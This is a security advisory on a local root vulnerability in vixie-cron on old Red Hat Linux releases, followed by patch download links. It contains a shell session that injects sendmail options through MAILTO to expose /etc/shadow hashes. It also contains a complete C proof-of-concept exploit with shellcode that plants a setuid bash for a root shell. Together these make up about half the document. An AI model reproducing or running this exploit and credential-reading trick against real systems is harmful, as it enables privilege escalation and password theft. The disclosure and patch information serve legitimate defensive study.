COMMAND
vixie-crond
SYSTEMS AFFECTED
Red Hat Linux 4.2, 5.2, 6.0, all architectures
PROBLEM
Following is based on Red Hat Security Advisory. By creating a
crontab that runs with a specially formatted 'MAILTO' environment
variable, it is possible for local users to overflow a
fixed-length buffer in the cron daemon's cron_popen() function.
Since the cron daemon runs as root, it would be theoretcially
possible for local users to use this buffer overflow to gain root
privilege. To the best of our knowledge, no known exploits exist
at this time. Also, it was possible to use specially formatted
'MAILTO' environment variables to send commands to sendmail.
Michal Zalewski added something from scratch:
[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy
jobe posted his exploit:
/*
* VixieCron 3.0 Proof of Concept Exploit - w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
* -jbowie@el8.org
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>
char shellcode[] =
"\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
"\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
"\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
"\xff/tmp/w00w00";
int
main(int argc,char *argv[])
{
FILE *cfile,*tmpfile;
struct stat sbuf;
struct passwd *pw;
int x;
pw = getpwuid(getuid());
chdir(pw->pw_dir);
cfile = fopen("./cronny","a+");
tmpfile = fopen("/tmp/w00w00","a+");
fprintf(cfile,"MAILTO=");
for(x=0;x<96;x++)
fprintf(cfile,"w00w00 ");
fprintf(cfile,"%s",shellcode);
fprintf(cfile,"\n* * * * * date\n");
fflush(cfile);
fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
fflush(tmpfile);
fclose(cfile),fclose(tmpfile);
chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
if(!(fork())) {
execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
} else {
printf("Waiting for shell be patient....\n");
for(;;) {
if(!(stat("./bash",&sbuf))) {
break;
} else { sleep(5); }
}
if((fork())) {
printf("Thank you for using w00warez!\n");
execl("./bash","bash",(char *)0);
} else {
remove("/tmp/w00w00");
sleep(5);
remove("./bash");
remove("./cronny");
execl("/usr/bin/crontab","crontab","-r",(char *)0);
}
}
}
SOLUTION
RPMs required:
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/i386/vixie-cron-3.0.1-37.4.2.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/alpha/vixie-cron-3.0.1-37.4.2.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/sparc/vixie-cron-3.0.1-37.4.2.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/vixie-cron-3.0.1-37.4.2.src.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/i386/vixie-cron-3.0.1-37.5.2.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/alpha/vixie-cron-3.0.1-37.5.2.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/sparc/vixie-cron-3.0.1-37.5.2.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/vixie-cron-3.0.1-37.5.2.src.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/i386/vixie-cron-3.0.1-38.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/alpha/vixie-cron-3.0.1-38.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/sparc/vixie-cron-3.0.1-38.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/vixie-cron-3.0.1-38.src.rpm
Debian GNU/Linux 2.1 alias slink:
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1-50.2.diff.gz
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1-50.2.dsc
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1.orig.tar.gz
http://security.debian.org/dists/stable/updates/binary-alpha/cron_3.0pl1-50.2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/cron_3.0pl1-50.2_i386.deb
http://security.debian.org/dists/stable/updates/binary-m68k/cron_3.0pl1-50.2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-sparc/cron_3.0pl1-50.2_sparc.deb
Debian GNU/Linux pre2.2 alias potato:
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1-52.diff.gz
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1-52.dsc
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1.orig.tar.gz
http://security.debian.org/dists/unstable/updates/binary-alpha/cron_3.0pl1-52_alpha.deb
http://security.debian.org/dists/unstable/updates/binary-arm/cron_3.0pl1-52_arm.deb
http://security.debian.org/dists/unstable/updates/binary-i386/cron_3.0pl1-52_i386.deb
http://security.debian.org/dists/unstable/updates/binary-m68k/cron_3.0pl1-52_m68k.deb
http://security.debian.org/dists/unstable/updates/binary-powerpc/cron_3.0pl1-52_powerpc.deb
http://security.debian.org/dists/unstable/updates/binary-sparc/cron_3.0pl1-52_sparc.deb